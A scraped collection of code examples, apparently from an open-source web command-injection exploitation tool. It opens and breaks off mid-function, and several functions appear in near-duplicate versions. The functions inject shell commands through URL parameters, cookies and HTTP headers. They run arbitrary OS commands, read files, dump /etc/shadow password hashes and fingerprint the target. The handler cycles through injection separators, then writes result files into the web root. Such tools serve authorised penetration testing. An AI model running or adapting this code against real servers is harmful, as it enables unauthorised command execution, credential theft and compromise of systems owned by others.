      target_arch = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
      target_arch = "".join(str(p) for p in target_arch)
      session_handler.store_cmd(url, cmd, target_arch, vuln_parameter)
    else:
      target_arch = session_handler.export_stored_cmd(url, cmd, vuln_parameter)
    if target_arch:
      if menu.options.verbose:
        print ""
      sys.stdout.write(Style.BRIGHT + "(!) The target operating system is " + Style.UNDERLINE + target_os + Style.RESET_ALL)
      sys.stdout.write(Style.BRIGHT + " and the hardware platform is " + Style.UNDERLINE + target_arch + Style.RESET_ALL + ".\n")
      sys.stdout.flush()
      # Add infos to logs file.   
      output_file = open(filename, "a")
      output_file.write("    (!) The target operating system is " + target_os)
      output_file.write(" and the hardware platform is " + target_arch + ".\n")
    output_file.close()
Example #43
0
def hostname(separator, payload, TAG, delay, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
  cmd = settings.HOSTNAME
  response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
  shell = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
  if shell:
    if menu.options.verbose:
      print ""
    shell = "".join(str(p) for p in shell)
    if not menu.options.verbose:
      print ""
    sys.stdout.write(Style.BRIGHT + "(!) The hostname is " + Style.UNDERLINE + shell + Style.RESET_ALL + ".\n")
    sys.stdout.flush()
    # Add infos to logs file. 
    output_file = open(filename, "a")
    output_file.write("    (!) The hostname is " + shell + ".\n")
    output_file.close()
Example #44
0
def powershell_version(separator, payload, TAG, timesec, prefix, suffix,
                       whitespace, http_request_method, url, vuln_parameter,
                       OUTPUT_TEXTFILE, alter_shell, filename):
    cmd = settings.PS_VERSION
    if alter_shell:
        cmd = cmd.replace("'", "\\'")
    else:
        cmd = "\"" + cmd + "\""
    # Evaluate injection results.
    if session_handler.export_stored_cmd(
            url, cmd, vuln_parameter) == None or menu.options.ignore_session:
        # Command execution results.
        response = fb_injector.injection(separator, payload, TAG, cmd, prefix,
                                         suffix, whitespace,
                                         http_request_method, url,
                                         vuln_parameter, OUTPUT_TEXTFILE,
                                         alter_shell, filename)
        # Evaluate injection results.
        ps_version = fb_injector.injection_results(url, OUTPUT_TEXTFILE,
                                                   timesec)
        ps_version = "".join(str(p) for p in ps_version)
        session_handler.store_cmd(url, cmd, ps_version, vuln_parameter)
    else:
        ps_version = session_handler.export_stored_cmd(url, cmd,
                                                       vuln_parameter)
    try:
        if float(ps_version):
            settings.PS_ENABLED = True
            # if settings.VERBOSITY_LEVEL >= 1:
            #   print("")
            # Output PowerShell's version number
            success_msg = "The PowerShell's version number is "
            success_msg += ps_version + Style.RESET_ALL + Style.BRIGHT
            sys.stdout.write(settings.print_success_msg(success_msg) + ".\n")
            sys.stdout.flush()
            # Add infos to logs file.
            output_file = open(filename, "a")
            success_msg = "The PowerShell's version number is " + ps_version + ".\n"
            output_file.write(
                re.compile(re.compile(settings.ANSI_COLOR_REMOVAL)).sub(
                    "", settings.SUCCESS_SIGN) + success_msg)
            output_file.close()
    except ValueError:
        warn_msg = "Heuristics have failed to identify the version of Powershell, "
        warn_msg += "which means that some payloads or injection techniques may be failed."
        print(settings.print_warning_msg(warn_msg))
        settings.PS_ENABLED = False
def system_passwords(separator, payload, TAG, delay, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):    
  if settings.TARGET_OS == "win":
    # Not yet implemented!
    pass 
  else:
    cmd = settings.SYS_PASSES            
    response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
    sys_passes = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
    if sys_passes :
      if menu.options.verbose:
        print ""
      sys.stdout.write("(*) Fetching '" + settings.SHADOW_FILE + "' to enumerate users password hashes... ")
      sys.stdout.flush()
      sys_passes = "".join(str(p) for p in sys_passes)
      sys_passes = sys_passes.replace(" ", "\n")
      sys_passes = sys_passes.split( )
      if len(sys_passes) != 0 :
        sys.stdout.write("[ " + Fore.GREEN + "SUCCEED" + Style.RESET_ALL + " ]")
        sys.stdout.write(Style.BRIGHT + "\n(!) Identified " + str(len(sys_passes)) + " entr" + ('ies', 'y')[len(sys_passes) == 1] + " in '" +  settings.SHADOW_FILE + "'.\n" + Style.RESET_ALL)
        sys.stdout.flush()
        # Add infos to logs file.   
        output_file = open(filename, "a")
        output_file.write("\n    (!) Identified " + str(len(sys_passes)) + " entr" + ('ies', 'y')[len(sys_passes) == 1] + " in '" +  settings.SHADOW_FILE + "'.\n" )
        output_file.close()
        count = 0
        for line in sys_passes:
          count = count + 1
          try:
            fields = line.split(":")
            if fields[1] != "*" and fields[1] != "!" and fields[1] != "":
              print "  (" +str(count)+ ") " + Style.BRIGHT + fields[0]+ Style.RESET_ALL + " : " + Style.BRIGHT + fields[1]+ Style.RESET_ALL
              # Add infos to logs file.   
              output_file = open(filename, "a")
              output_file.write("      (" +str(count)+ ") " + fields[0] + " : " + fields[1])
              output_file.close()
          # Check for appropriate '/etc/shadow' format.
          except IndexError:
            if count == 1 :
              sys.stdout.write(Fore.YELLOW + "(^) Warning: It seems that '" + settings.SHADOW_FILE + "' file is not in the appropriate format. Thus, it is expoted as a text file." + Style.RESET_ALL + "\n")
            print fields[0]
            output_file = open(filename, "a")
            output_file.write("      " + fields[0])
            output_file.close()
      else:
        sys.stdout.write("[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]")
        sys.stdout.flush()
        print "\n" + Fore.YELLOW + "(^) Warning: It seems that you don't have permissions to read '" + settings.SHADOW_FILE + "' to enumerate users password hashes." + Style.RESET_ALL
Example #46
0
def single_os_cmd_exec(separator, payload, TAG, delay, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
  cmd =  menu.options.os_cmd
  response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
  if session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None:
    # Evaluate injection results.
    shell = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
    shell = "".join(str(p) for p in shell)
    session_handler.store_cmd(url, cmd, shell, vuln_parameter)
  else:
    shell = session_handler.export_stored_cmd(url, cmd, vuln_parameter)
  if shell:
    if menu.options.verbose:
      print ""
    if shell != "":
      print Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL
    else:
      print Back.RED + settings.ERROR_SIGN + "The '" + cmd + "' command, does not return any output." + Style.RESET_ALL 
    sys.exit(0)
Example #47
0
def single_os_cmd_exec(separator, payload, TAG, timesec, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
  cmd =  menu.options.os_cmd
  if session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None or menu.options.ignore_session:
    # Command execution results.
    response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
    # Evaluate injection results.
    shell = fb_injector.injection_results(url, OUTPUT_TEXTFILE, timesec)
    shell = "".join(str(p) for p in shell)
    session_handler.store_cmd(url, cmd, shell, vuln_parameter)
  else:
    shell = session_handler.export_stored_cmd(url, cmd, vuln_parameter)
  if shell:
    if shell != "":
      print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
      logs.print_logs_notification(filename, url) 
    else:
      err_msg = "The '" + cmd + "' command, does not return any output."
      print settings.print_critical_msg(err_msg) 
    raise SystemExit()
Example #48
0
def file_read(separator, payload, TAG, delay, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
  file_to_read = menu.options.file_read
  # Execute command
  cmd = "echo $(" + settings.FILE_READ + file_to_read + ")"
  response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
  shell = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
  shell = "".join(str(p) for p in shell)
  if menu.options.verbose:
    print ""
  if shell:
    sys.stdout.write(Style.BRIGHT + "(!) The contents of file '" + Style.UNDERLINE + file_to_read + Style.RESET_ALL + "' : ")
    sys.stdout.flush()
    print shell
    output_file = open(filename, "a")
    output_file.write("    (!) The contents of file '" + file_to_read + "' : " + shell + ".\n")
    output_file.close()
  else:
   sys.stdout.write(Fore.YELLOW + "(^) Warning: It seems that you don't have permissions to read the '"+ file_to_read + "' file." + Style.RESET_ALL + "\n")
   sys.stdout.flush()
Example #49
0
def single_os_cmd_exec(separator, payload, TAG, delay, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
  cmd =  menu.options.os_cmd
  response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
  if session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None:
    # Evaluate injection results.
    shell = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
    shell = "".join(str(p) for p in shell)
    session_handler.store_cmd(url, cmd, shell, vuln_parameter)
  else:
    shell = session_handler.export_stored_cmd(url, cmd, vuln_parameter)
  if shell:
    if settings.VERBOSITY_LEVEL >= 1:
      print ""
    if shell != "":
      print Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL
    else:
      err_msg = "The '" + cmd + "' command, does not return any output."
      print settings.print_error_msg(err_msg) 
    sys.exit(0)
Example #50
0
def single_os_cmd_exec(separator, payload, TAG, delay, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
  cmd =  menu.options.os_cmd
  response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
  if session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None:
    # Evaluate injection results.
    shell = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
    shell = "".join(str(p) for p in shell)
    session_handler.store_cmd(url, cmd, shell, vuln_parameter)
  else:
    shell = session_handler.export_stored_cmd(url, cmd, vuln_parameter)
  if shell:
    if settings.VERBOSITY_LEVEL >= 1:
      print ""
    if shell != "":
      print Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL
    else:
      err_msg = "The '" + cmd + "' command, does not return any output."
      print settings.print_critical_msg(err_msg) 
    sys.exit(0)
Example #51
0
def system_passwords(separator, payload, TAG, delay, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):  
  cmd = settings.SYS_PASSES    
  response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
  sys_passes = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
  if sys_passes :
    sys.stdout.write("(*) Fetching '" + settings.SHADOW_FILE + "' to enumerate users password hashes... ")
    sys.stdout.flush()
    sys_passes = "".join(str(p) for p in sys_passes)
    sys_passes = sys_passes.replace(" ", "\n")
    sys_passes = sys_passes.split( )
    if len(sys_passes) != 0 :
      sys.stdout.write("[ " + Fore.GREEN + "SUCCEED" + Style.RESET_ALL + " ]")
      sys.stdout.write(Style.BRIGHT + "\n(!) Identified " + str(len(sys_passes)) + " entries in '" + settings.SHADOW_FILE + "'.\n" + Style.RESET_ALL)
      sys.stdout.flush()
      # Add infos to logs file.   
      output_file = open(filename, "a")
      output_file.write("    (!) Identified " + str(len(sys_passes)) + " entries in '" + settings.SHADOW_FILE + "'.\n" )
      output_file.close()
      count = 0
      for line in sys_passes:
        count = count + 1
        try:
          fields = line.split(":")
          if fields[1] != "*" and fields[1] != "!" and fields[1] != "":
            print "  ("+str(count)+") " + Style.BRIGHT + fields[0]+ Style.RESET_ALL + " : " + Style.BRIGHT + fields[1]+ Style.RESET_ALL
            # Add infos to logs file.   
            output_file = open(filename, "a")
            output_file.write("      ("+str(count)+") " + fields[0] + " : " + fields[1])
            output_file.close()
        # Check for appropriate '/etc/shadow' format.
        except IndexError:
          if count == 1 :
            sys.stdout.write(Fore.YELLOW + "(^) Warning: It seems that '" + settings.SHADOW_FILE + "' file is not in the appropriate format. Thus, it is expoted as a text file." + Style.RESET_ALL + "\n")
          print fields[0]
          output_file = open(filename, "a")
          output_file.write("      " + fields[0])
          output_file.close() 
    else:
      sys.stdout.write("[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]")
      sys.stdout.flush()
      print "\n" + Back.RED + "(x) Error: Cannot open '" + settings.SHADOW_FILE + "'." + Style.RESET_ALL
Example #52
0
def hostname(separator, payload, TAG, delay, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
  if settings.TARGET_OS == "win":
    settings.HOSTNAME = settings.WIN_HOSTNAME 
  cmd = settings.HOSTNAME
  response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
  if session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None:
    # Evaluate injection results.
    shell = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
    shell = "".join(str(p) for p in shell)
    session_handler.store_cmd(url, cmd, shell, vuln_parameter)
  else:
    shell = session_handler.export_stored_cmd(url, cmd, vuln_parameter)
  if shell:
    if menu.options.verbose:
      print ""
    sys.stdout.write(Style.BRIGHT + "(!) The hostname is " + Style.UNDERLINE + shell + Style.RESET_ALL + ".\n")
    sys.stdout.flush()
    # Add infos to logs file. 
    output_file = open(filename, "a")
    output_file.write("    (!) The hostname is " + shell + ".\n")
    output_file.close()
Example #53
0
def hostname(separator, payload, TAG, delay, prefix, suffix,
             http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE,
             alter_shell, filename):
    cmd = settings.HOSTNAME
    response = fb_injector.injection(separator, payload, TAG, cmd, prefix,
                                     suffix, http_request_method, url,
                                     vuln_parameter, OUTPUT_TEXTFILE,
                                     alter_shell, filename)
    shell = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
    if shell:
        if menu.options.verbose:
            print ""
        shell = "".join(str(p) for p in shell)
        if not menu.options.verbose:
            print ""
        sys.stdout.write(Style.BRIGHT + "(!) The hostname is " +
                         Style.UNDERLINE + shell + Style.RESET_ALL + ".\n")
        sys.stdout.flush()
        # Add infos to logs file.
        output_file = open(filename, "a")
        output_file.write("    (!) The hostname is " + shell + ".\n")
        output_file.close()
Example #54
0
def hostname(separator, payload, TAG, delay, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
  if settings.TARGET_OS == "win":
    settings.HOSTNAME = settings.WIN_HOSTNAME 
  cmd = settings.HOSTNAME
  response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
  if session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None:
    # Evaluate injection results.
    shell = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
    shell = "".join(str(p) for p in shell)
    session_handler.store_cmd(url, cmd, shell, vuln_parameter)
  else:
    shell = session_handler.export_stored_cmd(url, cmd, vuln_parameter)
  if shell:
    if settings.VERBOSITY_LEVEL >= 1:
      print ""
    success_msg = "The hostname is " +  shell
    sys.stdout.write(settings.print_success_msg(success_msg) + ".\n")
    sys.stdout.flush()
    # Add infos to logs file. 
    output_file = open(filename, "a")
    success_msg = "The hostname is " + shell + ".\n"
    output_file.write("    " + re.compile(re.compile(settings.ANSI_COLOR_REMOVAL)).sub("",settings.SUCCESS_SIGN) + success_msg)
    output_file.close()
Example #55
0
def powershell_version(separator, payload, TAG, delay, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename): 
  cmd = settings.PS_VERSION
  if alter_shell:
    cmd = cmd.replace("'","\\'")
  else:
    cmd = "\"" + cmd + "\""
  #Command execution results.
  response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
  # Evaluate injection results.
  if session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None:
    # Evaluate injection results.
    ps_version = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
    ps_version = "".join(str(p) for p in ps_version)
    session_handler.store_cmd(url, cmd, ps_version, vuln_parameter)
  else:
    ps_version = session_handler.export_stored_cmd(url, cmd, vuln_parameter)
  try:
    if float(ps_version):
      settings.PS_ENABLED = True
      if settings.VERBOSITY_LEVEL >= 1:
        print ""
      # Output PowerShell's version number
      success_msg = "The PowerShell's version number is " 
      success_msg += ps_version + Style.RESET_ALL + Style.BRIGHT
      sys.stdout.write(settings.print_success_msg(success_msg) + ".\n")
      sys.stdout.flush()
      # Add infos to logs file. 
      output_file = open(filename, "a")
      success_msg = "The PowerShell's version number is " + ps_version + ".\n"
      output_file.write("    " + re.compile(re.compile(settings.ANSI_COLOR_REMOVAL)).sub("",settings.SUCCESS_SIGN) + success_msg)
      output_file.close()
  except ValueError:
    warn_msg = "Heuristics have failed to identify PowerShell's version, "
    warn_msg += "which means that some payloads or injection techniques may be failed."
    print settings.print_warning_msg(warn_msg)
    settings.PS_ENABLED = False
Example #56
0
def fb_injection_handler(url, timesec, filename, http_request_method,
                         url_time_response):
    shell = False
    counter = 1
    vp_flag = True
    exit_loops = False
    no_result = True
    is_encoded = False
    stop_injection = False
    call_tmp_based = False
    next_attack_vector = False
    export_injection_info = False
    injection_type = "semi-blind command injection"
    technique = "file-based command injection technique"

    tmp_path = check_tmp_path(url, timesec, filename, http_request_method,
                              url_time_response)

    if not settings.LOAD_SESSION or settings.RETEST == True:
        TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))
        info_msg = "Trying to create a file in '" + settings.WEB_ROOT
        info_msg += "' for command execution results. "
        print(settings.print_info_msg(info_msg))

    i = 0
    # Calculate all possible combinations
    total = len(settings.WHITESPACE) * len(settings.PREFIXES) * len(
        settings.SEPARATORS) * len(settings.SUFFIXES)
    # Check if defined alter shell
    alter_shell = menu.options.alter_shell
    for whitespace in settings.WHITESPACE:
        for prefix in settings.PREFIXES:
            for suffix in settings.SUFFIXES:
                for separator in settings.SEPARATORS:

                    # Check injection state
                    settings.DETECTION_PHASE = True
                    settings.EXPLOITATION_PHASE = False
                    # If a previous session is available.
                    if settings.LOAD_SESSION:
                        try:
                            settings.FILE_BASED_STATE = True
                            url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, timesec, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation(
                                url, http_request_method)
                            checks.check_for_stored_tamper(payload)
                            OUTPUT_TEXTFILE = TAG + ".txt"
                            session_handler.notification(
                                url, technique, injection_type)
                            if technique == "tempfile-based injection technique":
                                #settings.LOAD_SESSION = True
                                tfb_handler.exploitation(
                                    url, timesec, filename, tmp_path,
                                    http_request_method, url_time_response)
                        except TypeError:
                            err_msg = "An error occurred while accessing session file ('"
                            err_msg += settings.SESSION_FILE + "'). "
                            err_msg += "Use the '--flush-session' option."
                            print(settings.print_critical_msg(err_msg))
                            raise SystemExit()

                    if settings.RETEST == True:
                        settings.RETEST = False
                        from src.core.injections.results_based.techniques.classic import cb_handler
                        cb_handler.exploitation(url, timesec, filename,
                                                http_request_method)

                    if not settings.LOAD_SESSION:
                        i = i + 1
                        # The output file for file-based injection technique.
                        OUTPUT_TEXTFILE = TAG + ".txt"
                        # Check for bad combination of prefix and separator
                        combination = prefix + separator
                        if combination in settings.JUNK_COMBINATION:
                            prefix = ""

                        try:
                            # File-based decision payload (check if host is vulnerable).
                            if alter_shell:
                                payload = fb_payloads.decision_alter_shell(
                                    separator, TAG, OUTPUT_TEXTFILE)
                            else:
                                payload = fb_payloads.decision(
                                    separator, TAG, OUTPUT_TEXTFILE)

                            # Check if defined "--prefix" option.
                            # Fix prefixes / suffixes
                            payload = parameters.prefixes(payload, prefix)
                            payload = parameters.suffixes(payload, suffix)

                            # Whitespace fixation
                            payload = payload.replace(" ", whitespace)

                            # Perform payload modification
                            payload = checks.perform_payload_modification(
                                payload)

                            # Check if defined "--verbose" option.
                            if settings.VERBOSITY_LEVEL == 1:
                                payload_msg = payload.replace("\n", "\\n")
                                print(settings.print_payload(payload_msg))
                            # Check if defined "--verbose" option.
                            elif settings.VERBOSITY_LEVEL > 1:
                                info_msg = "Generating payload for the injection..."
                                print(settings.print_info_msg(info_msg))
                                print(settings.print_payload(payload))

                            # Cookie Injection
                            if settings.COOKIE_INJECTION == True:
                                # Check if target host is vulnerable to cookie header injection.
                                vuln_parameter = parameters.specify_cookie_parameter(
                                    menu.options.cookie)
                                response = fb_injector.cookie_injection_test(
                                    url, vuln_parameter, payload)

                            # User-Agent HTTP Header Injection
                            elif settings.USER_AGENT_INJECTION == True:
                                # Check if target host is vulnerable to user-agent HTTP header injection.
                                vuln_parameter = parameters.specify_user_agent_parameter(
                                    menu.options.agent)
                                response = fb_injector.user_agent_injection_test(
                                    url, vuln_parameter, payload)

                            # Referer HTTP Header Injection
                            elif settings.REFERER_INJECTION == True:
                                # Check if target host is vulnerable to Referer HTTP header injection.
                                vuln_parameter = parameters.specify_referer_parameter(
                                    menu.options.referer)
                                response = fb_injector.referer_injection_test(
                                    url, vuln_parameter, payload)

                            # Host HTTP Header Injection
                            elif settings.HOST_INJECTION == True:
                                # Check if target host is vulnerable to Host HTTP header injection.
                                vuln_parameter = parameters.specify_host_parameter(
                                    menu.options.host)
                                response = fb_injector.host_injection_test(
                                    url, vuln_parameter, payload)

                            # Custom HTTP header Injection
                            elif settings.CUSTOM_HEADER_INJECTION == True:
                                # Check if target host is vulnerable to custom HTTP header injection.
                                vuln_parameter = parameters.specify_custom_header_parameter(
                                    settings.INJECT_TAG)
                                response = fb_injector.custom_header_injection_test(
                                    url, vuln_parameter, payload)

                            else:
                                # Check if target host is vulnerable.
                                response, vuln_parameter = fb_injector.injection_test(
                                    payload, http_request_method, url)

                            # Find the directory.
                            output = fb_injector.injection_output(
                                url, OUTPUT_TEXTFILE, timesec)
                            time.sleep(timesec)

                            try:

                                # Check if defined extra headers.
                                request = _urllib.request.Request(output)
                                headers.do_check(request)

                                # Evaluate test results.
                                output = _urllib.request.urlopen(request)
                                html_data = output.read()
                                shell = re.findall(r"" + TAG + "", html_data)

                                if len(shell) != 0 and shell[
                                        0] == TAG and not settings.VERBOSITY_LEVEL >= 1:
                                    percent = settings.SUCCESS_MSG
                                    info_msg = "Testing the " + "(" + injection_type.split(
                                        " "
                                    )[0] + ") " + technique + "." + "" + percent + ""
                                    sys.stdout.write(
                                        "\r" +
                                        settings.print_info_msg(info_msg))
                                    sys.stdout.flush()

                                if len(shell) == 0:
                                    raise _urllib.error.HTTPError(
                                        url, 404, 'Error', {}, None)

                            except _urllib.error.HTTPError as e:
                                if str(e.getcode()
                                       ) == settings.NOT_FOUND_ERROR:
                                    percent = ((i * 100) / total)
                                    float_percent = "{0:.1f}".format(
                                        round(((i * 100) / (total * 1.0)), 2))

                                    if call_tmp_based == True:
                                        exit_loops = True
                                        tmp_path = os.path.split(
                                            menu.options.file_dest)[0] + "/"
                                        tfb_controller(no_result, url, timesec,
                                                       filename, tmp_path,
                                                       http_request_method,
                                                       url_time_response)
                                        raise

                                    # Show an error message, after N failed tries.
                                    # Use the "/tmp/" directory for tempfile-based technique.
                                    elif i == int(menu.options.failed_tries
                                                  ) and no_result == True:
                                        tmp_path = check_tmp_path(
                                            url, timesec, filename,
                                            http_request_method,
                                            url_time_response)
                                        warn_msg = "It seems that you don't have permissions to "
                                        warn_msg += "read and/or write files in '" + settings.WEB_ROOT + "'."
                                        sys.stdout.write(
                                            "\r" + settings.print_warning_msg(
                                                warn_msg))
                                        print("")
                                        while True:
                                            if not menu.options.batch:
                                                question_msg = "Do you want to try the temporary directory (" + tmp_path + ") [Y/n] > "
                                                tmp_upload = _input(
                                                    settings.
                                                    print_question_msg(
                                                        question_msg))
                                            else:
                                                tmp_upload = ""
                                            if len(tmp_upload) == 0:
                                                tmp_upload = "y"
                                            if tmp_upload in settings.CHOICE_YES:
                                                exit_loops = True
                                                settings.TEMPFILE_BASED_STATE = True
                                                call_tfb = tfb_controller(
                                                    no_result, url, timesec,
                                                    filename, tmp_path,
                                                    http_request_method,
                                                    url_time_response)
                                                if call_tfb != False:
                                                    return True
                                                else:
                                                    if no_result == True:
                                                        return False
                                                    else:
                                                        return True
                                            elif tmp_upload in settings.CHOICE_NO:
                                                break
                                            elif tmp_upload in settings.CHOICE_QUIT:
                                                print("")
                                                raise
                                            else:
                                                err_msg = "'" + tmp_upload + "' is not a valid answer."
                                                print(
                                                    settings.print_error_msg(
                                                        err_msg))
                                                pass
                                        continue

                                    else:
                                        if exit_loops == False:
                                            if not settings.VERBOSITY_LEVEL >= 1:
                                                if str(float_percent
                                                       ) == "100.0":
                                                    if no_result == True:
                                                        percent = settings.FAIL_STATUS
                                                    else:
                                                        percent = ".. (" + str(
                                                            float_percent
                                                        ) + "%)"
                                                else:
                                                    percent = ".. (" + str(
                                                        float_percent) + "%)"

                                                info_msg = "Testing the " + "(" + injection_type.split(
                                                    " "
                                                )[0] + ") " + technique + "." + "" + percent + ""
                                                sys.stdout.write(
                                                    "\r" +
                                                    settings.print_info_msg(
                                                        info_msg))
                                                sys.stdout.flush()
                                                continue
                                            else:
                                                continue
                                        else:
                                            raise

                                elif str(e.getcode()
                                         ) == settings.UNAUTHORIZED_ERROR:
                                    err_msg = "Authorization required!"
                                    print(
                                        settings.print_critical_msg(err_msg) +
                                        "\n")
                                    raise SystemExit()

                                elif str(e.getcode()
                                         ) == settings.FORBIDDEN_ERROR:
                                    err_msg = "You don't have permission to access this page."
                                    print(
                                        settings.print_critical_msg(err_msg) +
                                        "\n")
                                    raise SystemExit()

                        except KeyboardInterrupt:
                            # Delete previous shell (text) files (output)
                            delete_previous_shell(separator, payload, TAG,
                                                  prefix, suffix, whitespace,
                                                  http_request_method, url,
                                                  vuln_parameter,
                                                  OUTPUT_TEXTFILE, alter_shell,
                                                  filename)
                            raise

                        except SystemExit:
                            if 'vuln_parameter' in locals():
                                # Delete previous shell (text) files (output)
                                delete_previous_shell(
                                    separator, payload, TAG, prefix, suffix,
                                    whitespace, http_request_method, url,
                                    vuln_parameter, OUTPUT_TEXTFILE,
                                    alter_shell, filename)
                            raise

                        except _urllib.error.URLError as e:
                            warn_msg = "It seems that you don't have permissions to "
                            warn_msg += "read and/or write files in '" + settings.WEB_ROOT + "'."
                            sys.stdout.write(
                                "\r" + settings.print_warning_msg(warn_msg))
                            err_msg = str(e).replace(": ", " (") + ")."
                            if menu.options.verbose > 1:
                                print("")
                            print(settings.print_critical_msg(err_msg))
                            # Provide custom server's root directory.
                            custom_web_root(url, timesec, filename,
                                            http_request_method,
                                            url_time_response)
                            continue

                        except:
                            raise

                    # Yaw, got shellz!
                    # Do some magic tricks!
                    if shell:
                        settings.FILE_BASED_STATE = True
                        found = True
                        no_result = False
                        # Check injection state
                        settings.DETECTION_PHASE = False
                        settings.EXPLOITATION_PHASE = True
                        if not settings.VERBOSITY_LEVEL >= 1 and \
                           not menu.options.alter_shell and \
                           not next_attack_vector:
                            next_attack_vector = True

                        if settings.COOKIE_INJECTION == True:
                            header_name = " cookie"
                            found_vuln_parameter = vuln_parameter
                            the_type = " parameter"

                        elif settings.USER_AGENT_INJECTION == True:
                            header_name = " User-Agent"
                            found_vuln_parameter = ""
                            the_type = " HTTP header"

                        elif settings.REFERER_INJECTION == True:
                            header_name = " Referer"
                            found_vuln_parameter = ""
                            the_type = " HTTP header"

                        elif settings.HOST_INJECTION == True:
                            header_name = "Host"
                            found_vuln_parameter = ""
                            the_type = " HTTP header"

                        elif settings.CUSTOM_HEADER_INJECTION == True:
                            header_name = " " + settings.CUSTOM_HEADER_NAME
                            found_vuln_parameter = ""
                            the_type = " HTTP header"

                        else:
                            header_name = ""
                            the_type = " parameter"
                            if http_request_method == "GET":
                                found_vuln_parameter = parameters.vuln_GET_param(
                                    url)
                            else:
                                found_vuln_parameter = vuln_parameter

                        if len(found_vuln_parameter) != 0:
                            found_vuln_parameter = " '" + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'"

                        # Print the findings to log file.
                        if export_injection_info == False:
                            export_injection_info = logs.add_type_and_technique(
                                export_injection_info, filename,
                                injection_type, technique)
                        if vp_flag == True:
                            vp_flag = logs.add_parameter(
                                vp_flag, filename, the_type, header_name,
                                http_request_method, vuln_parameter, payload)
                        logs.update_payload(filename, counter, payload)
                        counter = counter + 1

                        if not settings.LOAD_SESSION:
                            if not settings.VERBOSITY_LEVEL >= 1:
                                print("")
                            else:
                                checks.total_of_requests()

                        # Print the findings to terminal.
                        success_msg = "The"
                        if len(found_vuln_parameter
                               ) > 0 and not "cookie" in header_name:
                            success_msg += " " + http_request_method
                        success_msg += ('', ' (JSON)')[settings.IS_JSON] + (
                            '', ' (SOAP/XML)'
                        )[settings.IS_XML] + the_type + header_name
                        success_msg += found_vuln_parameter + " seems injectable via "
                        success_msg += "(" + injection_type.split(
                            " ")[0] + ") " + technique + "."
                        print(settings.print_success_msg(success_msg))
                        sub_content = str(checks.url_decode(payload))
                        print(settings.print_sub_content(sub_content))
                        # Export session
                        if not settings.LOAD_SESSION:
                            session_handler.injection_point_importation(
                                url,
                                technique,
                                injection_type,
                                separator,
